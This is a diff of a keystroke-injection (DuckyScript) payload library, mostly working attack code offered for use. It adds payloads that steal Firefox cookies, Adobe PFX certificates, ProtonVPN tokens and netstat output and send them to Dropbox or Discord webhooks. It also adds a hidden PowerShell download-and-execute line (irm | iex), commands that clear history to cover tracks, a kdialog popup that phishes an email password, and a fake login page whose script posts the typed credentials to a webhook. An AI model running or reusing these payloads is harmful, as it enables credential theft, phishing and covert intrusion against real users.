$headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
$headers.Add("Content-Type", "application/octet-stream")
Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $NotionDatabasePath; exit;
END_STRINGLN

21
payloads/library/exfiltration/Export_Cookies_From_Firefox/README.md Normal file
View File

@ -0,0 +1,21 @@
# Export Firefox Cookies Database
This script may come in handy for those who want to quickly save all the cookies of their Firefox session by exporting the database via dropbox accesstoken.
**Category**: Exfiltration
## Description
This script may come in handy for those who want to quickly save all the cookies of their Firefox session by exporting the database via dropbox accesstoken.
Open a PowerShell, select dynamically the Firefox path adding "cookies.sqlite" at the end, then set your exfiltration settings i.e. Dropbox access token and so on... then export it, then close the powershell.
## Dependencies
* Firefox must be installed
## Settings
- You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
`DEFINE DROPBOX_ACCESS_TOKEN "example"`

47
payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt Normal file
View File

@ -0,0 +1,47 @@
REM ####################################################
REM # |
REM # Title : Export Firefox Cookies Database |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM ####################################################
REM Requirements:
REM - Firefox must be installed
REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
DEFINE DROPBOX_ACCESS_TOKEN "example"
DEFAULT_DELAY 500
GUI r
STRINGLN powershell
DELAY 2000
REM Get cookies DB path
STRINGLN_BLOCK
$firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'
$firefoxProfile = Get-ChildItem -Path $firefoxProfilePath | Where-Object {$_.Name -like "*default-release"}
$filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'
END_STRINGLN
REM Setting about exfiltration
STRINGLN $accessToken = DROPBOX_ACCESS_TOKEN
ENTER
STRINGLN_BLOCK
$uploadUrl = "https://content.dropboxapi.com/2/files/upload"
$dropboxFilePath = "/cookies_exported.sqlite"
$headers = @{}
$headers.Add("Authorization", "Bearer $accessToken")
$headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
$headers.Add("Content-Type", "application/octet-stream")
Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $filePath; exit;
END_STRINGLN

19
payloads/library/exfiltration/Export_Cookies_From_Firefox/script.ps1 Normal file
View File

@ -0,0 +1,19 @@
$firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'
$firefoxProfile = Get-ChildItem -Path $firefoxProfilePath | Where-Object {$_.Name -like "*default-release"}
$filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'
$accessToken = ""
$authHeader = @{Authorization = "Bearer $accessToken"}
$dropboxFilePath = "/cookies_exported.sqlite"
$uploadUrl = "https://content.dropboxapi.com/2/files/upload"
$headers = @{}
$headers.Add("Authorization", "Bearer $accessToken")
$headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
$headers.Add("Content-Type", "application/octet-stream")
Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $fileContent

24
payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/README.md Normal file
View File

@ -0,0 +1,24 @@
# Export all saved certificates with Adobe Reader
This script can be used to export all PFX certificates saved in plain text and without any protection from Adobe Reader.
**Category**: Exfiltration
## Description
This script can be used to export all PFX certificates saved in plain text and without any protection from Adobe Reader.
Open a PowerShell, go to Adobe Reader Path dinamically, then select all the pfx certificates, then set the exfiltration settings and export the certificates trough a foreach using Dropbox.
**The unauthorized extraction of PFX certificates can be considered a criminal offense**. Taking possession of such certificates, which contain sensitive information such as private keys and critical authentication data, violates the owner's property rights.
## Dependencies
* Adobe Reader must be installed
* Internet Connection
## Settings
- You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
`DEFINE DROPBOX_ACCESS_TOKEN "example"`

55
payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt Normal file
View File

@ -0,0 +1,55 @@
REM ####################################################################
REM # |
REM # Title : Export all saved certificates with Adobe Reader |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM ####################################################################
REM Requirements:
REM - Adobe Reader must be installed
REM - Internet Connection
REM You must define your Dropbox accessToken or modify the exfiltration modality.
DEFINE DROPBOX_ACCESS_TOKEN example
GUI r
DELAY 1000
STRING PowerShell
DELAY 2000
REM Settings about Adobe Reader
STRINGLN_BLOCK
$roamingFolderPath = [Environment]::GetFolderPath('ApplicationData')
$securityFolderPath = Join-Path -Path $roamingFolderPath -ChildPath 'Adobe\Acrobat\DC\Security'
$pfxFiles = Get-ChildItem -Path $securityFolderPath -Filter '*.pfx' -File
END_STRINGLN
REM Setting about exfiltration
STRING $accessToken = "
STRING DROPBOX_ACCESS_TOKEN
STRING "
ENTER
STRINGLN_BLOCK
$authHeader = @{Authorization = "Bearer $accessToken"}
$uploadUrl = "https://content.dropboxapi.com/2/files/upload"
foreach ($file in $pfxFiles) {
$dropboxFilePath = "/$file"
$headers = @{}
$headers.Add("Authorization", "Bearer $accessToken")
$headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
$headers.Add("Content-Type", "application/octet-stream")
Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $file
}
exit
END_STRINGLN

48
payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/README.md Normal file
View File

@ -0,0 +1,48 @@
# Exports all the links of the downloads
This script can be used to export all the links of the latest downloads made through Firefox.
**Category**: Exfiltration
## Description
This script can be used to export all the links of the latest downloads made through Firefox.
This script open the Firefox app, then go to downloads page and copy all, then open a PowerShell and put all the download link in a var named $DOWNLOADS, then use a Discord Webhook to exfiltrate it.
## Dependencies
* Firefox must be installed
* Internet connection
## Settings
- You must define your Discord webhook if you want to use this method for the exfiltration
`DEFINE DISCORD_WEBHOOK example`
- This delay depends on the number of links
`DELAY 10000`
- This algorithm is used to avoid the size limit imposed by Invoke-RestMethod on the payload length
```
$len = $DOWNLOADS.Length
$MAX_LEN = 1900
$ITERATIONS = [math]::Ceiling($len / $MAX_LEN)
for ($i = 0; $i -lt $ITERATIONS; $i++) {
$init = $i * $MAX_LEN
$end = [math]::Min(($i + 1) * $MAX_LEN, $len)
$sub = $DOWNLOADS.Substring($init, $end - $init)
$Payload = @{content = $sub} | ConvertTo-Json
Invoke-RestMethod -Uri $WebhookUrl -Method Post -Body $Payload -ContentType 'application/json'
}
```

67
payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/payload.txt Normal file
View File

@ -0,0 +1,67 @@
REM ###########################################################
REM # |
REM # Title : Exports all the links of the downloads |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Windows 10/11 |
REM # |
REM ###########################################################
REM Requirements:
REM - Firefox installed
REM You must define your Discord webhook if you want to use this method for the exfiltration
DEFINE DISCORD_WEBHOOK example
DEFAULT_DELAY 500
REM Open Firefox
GUI
DELAY 1000
STRINGLN Firefox
DELAY 2000
REM Goto downloads and copy all
CTRL j
CTRL a
CTRL c
REM Open a PowerShell and put all the links into $DOWNLOADS var
GUI r
STRINGLN powershell
DELAY 1000
STRING $DOWNLOADS="
CTRL v
ENTER
REM It depends on the number of links
DELAY 10000
STRINGLN "
REM Exfiltration using Discord Webhook
STRINGLN $WebhookUrl = "DISCORD_WEBHOOK"
STRINGLN $Payload = @{content = $DOWNLOADS} | ConvertTo-Json
REM This algorithm is used to avoid the size limit imposed by Invoke-RestMethod on the payload length
STRINGLN_BLOCK
$len = $DOWNLOADS.Length
$MAX_LEN = 1900
$ITERATIONS = [math]::Ceiling($len / $MAX_LEN)
for ($i = 0; $i -lt $ITERATIONS; $i++) {
$init = $i * $MAX_LEN
$end = [math]::Min(($i + 1) * $MAX_LEN, $len)
$sub = $DOWNLOADS.Substring($init, $end - $init)
$Payload = @{content = $sub} | ConvertTo-Json
Invoke-RestMethod -Uri $WebhookUrl -Method Post -Body $Payload -ContentType 'application/json'
}
exit;
END_STRINGLN

37
payloads/library/exfiltration/ProtonVPN-config/ProtonVPN-config.ps1 Normal file
View File

@ -0,0 +1,37 @@
$Path = "$Env:USERPROFILE\AppData\Local\ProtonVPN\ProtonVPN*\*\user.config"
$Content = Get-Content -Path $Path
$text = $Path + $Content
# Discord Connection
$hookurl = "$discord"
# Loop for Discord
$ConstantLimitForRestMethod = 1999
$TMP_Body = @{
'username' = $env:username
'content' = ""
}
for($i = 0; $i -lt $text.Length; $i+=$ConstantLimitForRestMethod){
try {
$TMP_Body = @{
'username' = $env:username
'content' = $text.Substring($i, $ConstantLimitForRestMethod)
}
} catch [ArgumentOutOfRangeException] {
if($text.Length-$i -gt 0){
$TMP_Body = @{
'username' = $env:username
'content' = $text.Substring($i, $text.Length-$i)
}
} else {
break
}
}
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($TMP_Body | ConvertTo-Json)
}
# Clear the PowerShell command history
Clear-History

37
payloads/library/exfiltration/ProtonVPN-config/README.md Normal file
View File

@ -0,0 +1,37 @@
# ProtonVPN config file ✅
A script used to stole target ProtonVPN config file.
**Category**: Credentials, Exfiltration
## Description
This script will stole target ProtonVPN config file.
Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
In the config file you can find a lot information about the user like:
- UserUid
- UserAccessToken
- UserRefreshToken
- UserAuthenticationPublicKey
- UserAuthenticationSecretKey
- UserAuthenticationCertificatePem
- UserCertificationServerPublicKey
- and so on...
Then it cleans up traces of what you have done after.
## Getting Started
### Dependencies
* ProtonVPN user logged at least one time
* An internet connection
* Windows 10,11
### Executing program
* Plug in your device
* Invoke Get-Content for get in plaintext the ProtonVPN .config content
* Invoke-WebRequest will be entered in the Run Box to send the content

43
payloads/library/exfiltration/ProtonVPN-config/payload.txt Normal file
View File

@ -0,0 +1,43 @@
REM ###################################################################
REM # |
REM # Title : ProtonVPN-config-to-Discord-Exfiltration |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Credentials, Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM ###################################################################
REM Title: ProtonVPN-config-to-Discord-Exfiltration
REM Author: Aleff
REM Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
REM In the config file you can find a lot information about the user like:
REM - UserUid
REM - UserAccessToken
REM - UserRefreshToken
REM - UserAuthenticationPublicKey
REM - UserAuthenticationSecretKey
REM - UserAuthenticationCertificatePem
REM - UserCertificationServerPublicKey
REM - and so on...
REM Then it cleans up traces of what you have done after.
REM Target: Windows 10-11 (PowerShell + ProtonVPN software)
REM Version: 1.0
REM Category: Credentials, Exfiltration
REM Requirements: ProtonVPN user logged at least one time and internet connection
REM
REM REQUIRED - Provide your url WEBHOOK - https://discordapp.com/api/webhooks/<webhook_id>/<token>
DEFINE WEBHOOK example.com
DELAY 2000
GUI r
DELAY 250
DELETE
STRING powershell -w h -ep bypass $discord='
STRING WEBHOOK
REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
DEFINE PAYLOAD example.com
STRING ';irm PAYLOAD | iex
ENTER

BIN
payloads/library/exfiltration/Tree_structure_of_the_operating_system/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 16 KiB

28
payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md Normal file
View File

@ -0,0 +1,28 @@
# Tree Structure Of The Operating System
This script allows the exfiltration of the structure of the files contained in a machine, through the use of the tree command in fact it is possible to know all the various links between files, folders and subfolders in a quick and graphically easy to understand way.
**Category**: Exfiltration
![](1.png)
## Description
This script allows the exfiltration of the structure of the files contained in a machine, through the use of the tree command in fact it is possible to know all the various links between files, folders and subfolders in a quick and graphically easy to understand way.
Open a PowerShell and run the command `tree /f /a > out.txt` that permit to list the file name and not only the directories, using text characters instead of graphic characters to display rows linking subdirectories. Save all the output in the out.txt file and then send this file through Dropbox.
## Dependencies
* Firefox must be installed
## Settings
- You must define your Dropbox accessToken or modify the exfiltration modality.
`DEFINE #DROPBOX_ACCESS_TOKEN example`
- The path to check can be changed putting the full-path `tree <full-path> /f /a > out.txt`.
- `tree \ /f /a > out.txt`
- `tree C:\Users\Aleff\Documents /f /a > out.txt`

38
payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt Normal file
View File

@ -0,0 +1,38 @@
REM ###########################################################
REM # |
REM # Title : Tree Structure Of The Operating System |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM ###########################################################
REM Requirements:
REM - Internet connection
REM Set yout Dropbox access token
DEFINE #DROPBOX_ACCESS_TOKEN example
GUI r
DELAY 1000
STRINGLN PowerShell
DELAY 1000
REM Setting about exfiltration
STRINGLN_BLOCK
tree /f /a > out.txt
$filePath=".\out.txt";
$accessToken="#DROPBOX_ACCESS_TOKEN"
$authHeader = @{Authorization = "Bearer $accessToken"}
$dropboxFilePath = "/out_exported.txt"
$uploadUrl = "https://content.dropboxapi.com/2/files/upload"
$headers = @{}
$headers.Add("Authorization", "Bearer $accessToken")
$headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
$headers.Add("Content-Type", "application/octet-stream")
Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $fileContent; exit;
END_STRINGLN

2
payloads/library/exfiltration/WiFi_Passwd_Grab/Fast WiFi Exfil (Powershell - No RunMRU History)
View File

@ -11,7 +11,7 @@ ENTER
DELAY 100
GUI r
DELAY 200
STRING powershell -w h -ep bypass Remove-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU -Name * -ErrorAction SilentlyContinue
STRING reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Start_TrackProgs" /t REG_DWORD /d "0" /f
ENTER
DELAY 100
EXIT

41
payloads/library/exfiltration/Windows-netstat/README.md Normal file
View File

@ -0,0 +1,41 @@
# Windows netstat ✅
A script used to stole target netstat status.
**Category**: Exfiltration
## Description
This script will stole target netstat status.
Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
Then it cleans up traces of what you have done after.
## Getting Started
### Dependencies
* An internet connection
* Windows 10,11
### Executing program
* Plug in your device
* Invoke the indicated commands
* Invoke-WebRequest will be entered in the Run Box to send the content
### Settings
Put 1 on the function that you want to active, else 0.
Functions available:
- default (*or simple 'netstat' command*)
- routing_table **$r**
- listening_canonical **$lc**
- listening_numerical **$ln**
- all_canonical **$ac**
- all_numerical **$an**
- offload **ot**
- proto **$p "\<protocol>"**
- *In this option you must put the protocol that you want to monitor, for example $proto="TCP" if you want to monitor TCP, else leave blank, so $proto="".*

79
payloads/library/exfiltration/Windows-netstat/Windows-netstat.ps1 Normal file
View File

@ -0,0 +1,79 @@
# Discord send function
function exfiltration () {
param(
[Parameter (Mandatory = $true, Position=0)] [String]$command,
[Parameter (Mandatory = $true, Position=1)] [String]$text
)
# Loop for Discord
$ConstantLimitForRestMethod = 1999
$TMP_Body = @{
'username' = $command
'content' = ""
}
for($i = 0; $i -lt $text.Length; $i+=$ConstantLimitForRestMethod){
try {
$TMP_Body = @{
'username' = $command
'content' = $text.Substring($i, $ConstantLimitForRestMethod)
}
} catch [ArgumentOutOfRangeException] {
if($text.Length-$i -gt 0){
$TMP_Body = @{
'username' = $command
'content' = $text.Substring($i, $text.Length-$i)
}
} else {
break
}
}
Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($TMP_Body | ConvertTo-Json)
}
}
# send command format
function send_command(){
param(
[Parameter (Mandatory = $true, Position=0)] [String]$cmd
)
$out = Invoke-Expression $cmd
(exfiltration $cmd [string]$out)
}
# Settings
if ( $d -eq "1") {
$cmd = "netstat"
(send_command $cmd)
}
if ( $r -eq "1") {
$cmd = "netstat -r"
(send_command $cmd)
}
if ( $lc -eq "1") {
$cmd = "netstat -af"
(send_command $cmd)
}
if ( $ln -eq "1") {
$cmd = "netstat -an"
(send_command $cmd)
}
if ( $ac -eq "1") {
$cmd = "netstat -qf"
(send_command $cmd)
}
if ( $an -eq "1") {
$cmd = "netstat -qn"
(send_command $cmd)
}
if ( $o -eq "1") {
$cmd = "netstat -t"
(send_command $cmd)
}
if ( $p -ne "" ) {
# format $proto="TCP"
$cmd = "netstat -ps " + $p
(send_command $cmd)
}
# Clear the PowerShell command history
Clear-History

39
payloads/library/exfiltration/Windows-netstat/payload.txt Normal file
View File

@ -0,0 +1,39 @@
REM ###################################################################
REM # |
REM # Title : Windows-netstat-to-Discord-Exfiltration |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM ###################################################################
REM Put 1 on the function that you want to active, else 0. Functions available:
REM - default (simple 'netstat' command)
REM - routing_table $r
REM - listening_canonical $lc
REM - listening_numerical $ln
REM - all_canonical $ac
REM - all_numerical $an
REM - offload ot
REM - proto $p "<protocol>"
REM - - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="".
REM Requirements: Internet connection
REM
REM REQUIRED - Provide your Discord WEBHOOK
DEFINE WEBHOOK https://discordapp.com/api/webhooks/<webhook_id>/<token>
DELAY 2000
GUI r
DELAY 250
DELETE
STRING powershell -w h -ep bypass $discord='
STRING WEBHOOK
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1
DEFINE PAYLOAD example.com
STRING ';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm PAYLOAD | iex
ENTER

28
payloads/library/phishing/ExfiltrateEmailAndPasswordByPhising_Linux/README.md Normal file
View File

@ -0,0 +1,28 @@
# Exfiltrate Email And Password By Phising - Linux ✅
A script used to exfiltrate the email and the email password by a popup (KDE/kdialog based) phishing based on linux systems.
**Category**: Phishing, Credentials
## Description
A script used to exfiltrate the email and the email password by a popup (KDE/kdialog based) phishing based on linux systems.
Opens a shell, get the email and the email password by a popup, send the input to a Discord webhook.
## Getting Started
### Dependencies
* Internet Connection
* Discord webhook
* KDE/kdialog based
### Executing program
* Plug in your device
### Settings
* Set the Discord webhook

31
payloads/library/phishing/ExfiltrateEmailAndPasswordByPhising_Linux/payload.txt Normal file
View File

@ -0,0 +1,31 @@
REM ###########################################################
REM # |
REM # Title : Exfiltrate Email And Password By Phising |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Phishing |
REM # Target : Linux |
REM # |
REM ###########################################################
REM Requirements:
REM - Internet Connection
REM - Discord webhook
REM - KDE/kdialog based
REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
DEFINE #WEBHOOK example.com
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### POPUP SECTION ####
STRINGLN WEBHOOK_URL="#WEBHOOK"
DELAY 500
REM All-in-one is important
STRING $(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(echo $(kdialog --sorry 'Email incorrect.\n Will not connect to server, please retry.'; kdialog --title 'Email \n Put your email address to connect yout account.' --inputbox 'Email:'; kdialog --title 'Email Login' --password 'Email Password:';))\"}" $WEBHOOK_URL); history -c; exit;
ENTER

44
payloads/library/phishing/StandardPhishingCampaign_Linux/DuckyScript-DOC.md Normal file
View File

@ -0,0 +1,44 @@
# DuckyScript Documentation
This DuckyScript code performs several actions related to downloading and unzipping a file from a specified link. The script creates a new random directory, downloads a zip file from the specified URL, and unzips it. It also opens a login page.
- First, the script creates a new random directory using the mktemp command and assigns its path to the dir_name variable. The DELAY command is used to pause the script execution for 500 milliseconds.
```DuckyScript
REM Create a random directory
STRINGLN dir_name=$(mktemp -d)
DELAY 500
```
- Next, the script sets a timer using the sleep command to delete the directory after 60 minutes (3600 seconds). The rm -rf command is used to remove the directory and its contents. The & character is used to run this command in the background, allowing the script to continue running. Another DELAY command is used to pause the script execution for 500 milliseconds.
```DuckyScript
REM Delete the directory after 60 minutes (3600 seconds)
STRINGLN (sleep 3600 && rm -rf $dir_name) &
DELAY 500
```
- The script then moves into the directory using the cd command and the dir_name variable. Another DELAY command is used to pause the script execution for 500 milliseconds.
```DuckyScript
REM Move into the directory
STRINGLN cd $dir_name
DELAY 500
```
- Next, the script downloads the zip file from the specified URL using the curl command. The LOk option is used to download the file and give it the same name as the original file. The #ZIP_LINK placeholder should be replaced with the actual URL of the zip file. Another DELAY command is used to pause the script execution for 500 milliseconds.
```DuckyScript
REM Download the zip from your own link
STRINGLN curl -LOk "#ZIP_LINK"
DELAY 500
```
- The script then unzips the downloaded file using the unzip command. The DELAY command is used again to pause the script execution for 500 milliseconds.
```DuckyScript
REM Unzip it
STRINGLN unzip file.zip
DELAY 500
```
- Finally, the script opens the login page using the xdg-open command and the login.html file. The exit command is used to terminate the script.
```DuckyScript
REM Open the login page
STRINGLN xdg-open login.html; exit;
```

190
payloads/library/phishing/StandardPhishingCampaign_Linux/README.md Normal file
View File

@ -0,0 +1,190 @@
# Standard Phishing Campaign
A script used to exfiltrate the Standard username and password by a phishing campaign.
**Category**: Phishing
## Description
A script used to exfiltrate the Standard username and password by a phishing campaign.
This DuckyScript code performs several actions related to downloading and unzipping a file from a specified link. The script creates a new random directory, downloads a zip file from the specified URL, and unzips it. It also opens a login page.
This payload was created and tested on Linux but since the HTML markup code and JavaScript language are cross platform it will certainly be usable on machines running Windows or MacOS as well. However, it is essential to modify the DuckyScript script appropriately according to the terminal emulator used (PowerShell for Windows, Shell MacOS for Macs) since the commands are often not the same. To make it easier to use below you can find the various tested configurations, at the moment it is not available for macOS because since I do not have one it cannot be tested and therefore I cannot give the certainty that it works, however I hope that in the Hak5 community there may be someone who can contribute to this payload by completing it with this missing part.
## Payload.txt config - Windows 10/11 - Tested on Windows 11
```DuckyScript
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
STRINGLN do { $dir_name = [IO.Path]::Combine([IO.Path]::GetTempPath(), [IO.Path]::GetRandomFileName()) } while (Test-Path $dir_name)
DELAY 500
STRINGLN New-Item -ItemType Directory -Path $dir_name -ErrorAction Stop
DELAY 500
STRINGLN Set-Location $dir_name -ErrorAction Stop
DELAY 500
STRINGLN Invoke-WebRequest -Uri "#ZIP_LINK" -OutFile file.zip
DELAY 2000
STRINGLN Expand-Archive file.zip
DELAY 500
STRINGLN Invoke-Item login.html
DELAY 500
```
## Payload.txt config - Linux (Debian based) - Tested on Ubuntu 23.04
```DuckyScript
DELAY 1000
CTRL-ALT t
DELAY 2000
REM Actual script...
```
# Getting Started
## Dependencies
* Internet Connection
* You own ZIP link
* Discord webhook (or whatever you want to use for the exfiltration)
* Python
* 'ExecutionPolicy Bypass' if used in Windows 10/11
## Settings
* Set the Discord wehbook (or whatever you want) into the script.js file at line 3
```JavaScript
// SET YOUR DISCORD WEBHOOK or whatever you want to exfiltrate the data
const discord_webhook_url = "https://discord.com/api/webhooks/123/abc";
```
* Set the redirect link that you want to use when the payload is sent
```JavaScript
// DEFINE the redirect link preferred
window.location.href = "https://www.example.com";
```
* Set the ZIP link as described in the payload.txt
```DuckyScript
REM REQUIRED - Replace example.com/file.zip with your own ZIP link. The zip should contian the files ['login.html', 'script.js']
DEFINE #ZIP_LINK example.com/file.zip
```
## JavaScript/HTML Documentation
- This JavaScript code aims to send the credentials entered in an HTML form to a Discord Webhook or any other remote server. The code is written as an asynchronous function named **send_login()**, which is called when the user presses the login button in the HTML form.
```JavaScript
async function send_login() {
// ...
}
```
- The first thing the code does is to set the **discord_webhook_url** constant to the Discord Webhook URL where the message containing the credentials will be sent. Then, the **email** and **password** values are retrieved from the form input fields using their **id** attributes.
```JavaScript
// SET YOUR DISCORD WEBHOOK or whatever you want to exfiltrate the data
const discord_webhook_url = "https://discord.com/api/webhooks/123/abc";
// Retrieve data from POST form
const email = document.getElementById('email').value;
const password = document.getElementById('password').value;
```
- After that, a **message** variable is created by concatenating the **email** and **password** values. This message will be sent to the Discord Webhook.
```JavaScript
// Create message content
const message = "Email: " + email + " \n " + "Password: " + password;
```
- The **fetch()** method is used to send an HTTP POST request to the Discord Webhook URL. The request body is a JSON object that contains the **message** content. If the response status is **ok**, the user is redirected to the specified URL, which is set in the **window.location.href** property. Otherwise, a generic error is thrown.
```JavaScript
// Send POST request to Discord webhook URL
const response = await fetch(discord_webhook_url, {
method: "POST",
headers: {
"Content-Type": "application/json"
},
body: JSON.stringify({ content: message })
});
if (response.ok) {
// DEFINE the redirect link preferred
window.location.href = "https://www.example.com";
} else {
// Otherwise, throw a generic error
throw new Error('Generic error!');
```
- If an error occurs during the execution of the **fetch()** method, it will be caught by the **catch()** block and logged to the console using the **console.error()** method.
```JavaScript
try{
// ...
} catch (error) {
// Log any errors to the console
console.error(error);
}
```
- To use this code, you need to replace the **discord_webhook_url** constant with the actual Discord Webhook URL or the URL of any other remote server that you want to send the message to. You also need to ensure that the **id** attributes of the email and password input fields in the HTML form match the values used in the **getElementById()** method calls. Finally, you need to call the **send_login()** function when the user submits the form.
```HTML
<form onsubmit="send_login(); return false;" method="post">
<div class="form-group">
<label for="email">Email:</label>
<input type="email" class="form-control" id="email" placeholder="Insert your email">
</div>
<div class="form-group">
<label for="password">Password:</label>
<input type="password" class="form-control" id="password" placeholder="Insert your password">
</div>
<button type="submit" class="btn btn-primary">Login</button>
</form>
```
## DuckyScript Documentation
This DuckyScript code performs several actions related to downloading and unzipping a file from a specified link. The script creates a new random directory, downloads a zip file from the specified URL, and unzips it. It also opens a login page.
- First, the script creates a new random directory using the mktemp command and assigns its path to the dir_name variable. The DELAY command is used to pause the script execution for 500 milliseconds.
```DuckyScript
REM Create a random directory
STRINGLN dir_name=$(mktemp -d)
DELAY 500
```
- Next, the script sets a timer using the sleep command to delete the directory after 60 minutes (3600 seconds). The rm -rf command is used to remove the directory and its contents. The & character is used to run this command in the background, allowing the script to continue running. Another DELAY command is used to pause the script execution for 500 milliseconds.
```DuckyScript
REM Delete the directory after 60 minutes (3600 seconds)
STRINGLN (sleep 3600 && rm -rf $dir_name) &
DELAY 500
```
- The script then moves into the directory using the cd command and the dir_name variable. Another DELAY command is used to pause the script execution for 500 milliseconds.
```DuckyScript
REM Move into the directory
STRINGLN cd $dir_name
DELAY 500
```
- Next, the script downloads the zip file from the specified URL using the curl command. The LOk option is used to download the file and give it the same name as the original file. The #ZIP_LINK placeholder should be replaced with the actual URL of the zip file. Another DELAY command is used to pause the script execution for 500 milliseconds.
```DuckyScript
REM Download the zip from your own link
STRINGLN curl -LOk "#ZIP_LINK"
DELAY 500
```
- The script then unzips the downloaded file using the unzip command. The DELAY command is used again to pause the script execution for 500 milliseconds.
```DuckyScript
REM Unzip it
STRINGLN unzip file.zip
DELAY 500
```
- Finally, the script opens the login page using the xdg-open command and the login.html file. The exit command is used to terminate the script.
```DuckyScript
REM Open the login page
STRINGLN xdg-open login.html; exit;
```

55
payloads/library/phishing/StandardPhishingCampaign_Linux/Script-DOC.md Normal file
View File

@ -0,0 +1,55 @@
# JavaScript/HTML Documentation
- This JavaScript code aims to send the credentials entered in an HTML form to a Discord Webhook or any other remote server. The code is written as an asynchronous function named **send_login()**, which is called when the user presses the login button in the HTML form.
```JavaScript
async function send_login() {
// ...
}
```
- The first thing the code does is to set the **discord_webhook_url** constant to the Discord Webhook URL where the message containing the credentials will be sent. Then, the **email** and **password** values are retrieved from the form input fields using their **id** attributes.
```JavaScript
// SET YOUR DISCORD WEBHOOK or whatever you want to exfiltrate the data
const discord_webhook_url = "https://discord.com/api/webhooks/123/abc";
// Retrieve data from POST form
const email = document.getElementById('email').value;
const password = document.getElementById('password').value;
```
- After that, a **message** variable is created by concatenating the **email** and **password** values. This message will be sent to the Discord Webhook.
```JavaScript
// Create message content
const message = "Email: " + email + " \n " + "Password: " + password;
```
- The **fetch()** method is used to send an HTTP POST request to the Discord Webhook URL. The request body is a JSON object that contains the **message** content. If the response status is **ok**, the user is redirected to the specified URL, which is set in the **window.location.href** property. Otherwise, a generic error is thrown.
```JavaScript
// Send POST request to Discord webhook URL
const response = await fetch(discord_webhook_url, {
method: "POST",
headers: {
"Content-Type": "application/json"
},
body: JSON.stringify({ content: message })
});
if (response.ok) {
// DEFINE the redirect link preferred
window.location.href = "https://www.example.com";
} else {
// Otherwise, throw a generic error
throw new Error('Generic error!');
```
- If an error occurs during the execution of the **fetch()** method, it will be caught by the **catch()** block and logged to the console using the **console.error()** method.
```JavaScript
try{
// ...
} catch (error) {
// Log any errors to the console
console.error(error);
}
```
- To use this code, you need to replace the **discord_webhook_url** constant with the actual Discord Webhook URL or the URL of any other remote server that you want to send the message to. You also need to ensure that the **id** attributes of the email and password input fields in the HTML form match the values used in the **getElementById()** method calls. Finally, you need to call the **send_login()** function when the user submits the form.
```HTML

BIN
payloads/library/phishing/StandardPhishingCampaign_Linux/Script.zip Normal file
View File

Binary file not shown.

34
payloads/library/phishing/StandardPhishingCampaign_Linux/login.html Normal file
View File

@ -0,0 +1,34 @@
<!DOCTYPE html>
<html>
<head>
<title>Form di Login con Bootstrap</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
